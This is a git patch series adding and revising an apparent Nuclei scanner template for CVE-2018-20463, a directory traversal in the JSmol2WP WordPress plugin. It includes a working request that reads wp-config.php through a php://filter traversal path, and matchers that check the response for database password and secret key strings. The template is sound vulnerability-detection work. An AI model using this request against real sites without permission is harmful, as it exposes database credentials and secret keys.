From d740257f5d28ec5e488fc12d4c895ea5bd0a289b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 19 Aug 2022 19:09:06 +0530 Subject: [PATCH 1/3] Create CVE-2018-20463.yaml --- cves/2018/CVE-2018-20463.yaml | 41 +++++++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 cves/2018/CVE-2018-20463.yaml diff --git a/cves/2018/CVE-2018-20463.yaml b/cves/2018/CVE-2018-20463.yaml new file mode 100644 index 0000000000..dcc13aa4ad --- /dev/null +++ b/cves/2018/CVE-2018-20463.yaml @@ -0,0 +1,41 @@ +id: CVE-2018-20463 + +info: + name: JSmol2WP <= 1.07 - Directory Traversal + author: vinit989 + severity: high + description: | + An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. There is an arbitrary file read vulnerability via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. This can also be used for SSRF. + reference: + - https://wpscan.com/vulnerability/9197 + - https://nvd.nist.gov/vuln/detail/CVE-2018-20463 + classification: + cve-id: CVE-2018-20463 + metadata: + verified: true + tags: cve,cve2018,ssrf,traversal + + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "AUTH_KEY" + - "NONCE_SALT" + - "DB_PASSWORD" + condition: and + + - type: word + part: header + words: + - text/plain + + - type: status + status: + - 200 From 6532792b926960be8bcf2d91400ebf1b095f11ab Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 19 Aug 2022 19:12:39 +0530 Subject: [PATCH 2/3] Update CVE-2018-20463.yaml --- cves/2018/CVE-2018-20463.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2018/CVE-2018-20463.yaml b/cves/2018/CVE-2018-20463.yaml index dcc13aa4ad..e500c7d61d 100644 --- a/cves/2018/CVE-2018-20463.yaml +++ b/cves/2018/CVE-2018-20463.yaml @@ -13,8 +13,7 @@ info: cve-id: CVE-2018-20463 metadata: verified: true - tags: cve,cve2018,ssrf,traversal - + tags: cve,cve2018,ssrf,traversal,wp,wp-plugin,wordpress requests: - method: GET From bd419534de4a4c2508d855303fa25641dd708249 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 21 Aug 2022 14:03:27 +0530 Subject: [PATCH 3/3] Update CVE-2018-20463.yaml --- cves/2018/CVE-2018-20463.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2018/CVE-2018-20463.yaml b/cves/2018/CVE-2018-20463.yaml index e500c7d61d..dae6b668ca 100644 --- a/cves/2018/CVE-2018-20463.yaml +++ b/cves/2018/CVE-2018-20463.yaml @@ -8,12 +8,13 @@ info: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. There is an arbitrary file read vulnerability via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. This can also be used for SSRF. reference: - https://wpscan.com/vulnerability/9197 + - https://wordpress.org/plugins/jsmol2wp/ - https://nvd.nist.gov/vuln/detail/CVE-2018-20463 classification: cve-id: CVE-2018-20463 metadata: verified: true - tags: cve,cve2018,ssrf,traversal,wp,wp-plugin,wordpress + tags: cve,cve2018,traversal,wp,wp-plugin,wordpress,jsmol2wp requests: - method: GET @@ -25,9 +26,8 @@ requests: - type: word part: body words: - - "AUTH_KEY" - - "NONCE_SALT" - - "DB_PASSWORD" + - "'DB_USER'," + - "'DB_PASSWORD'" condition: and - type: word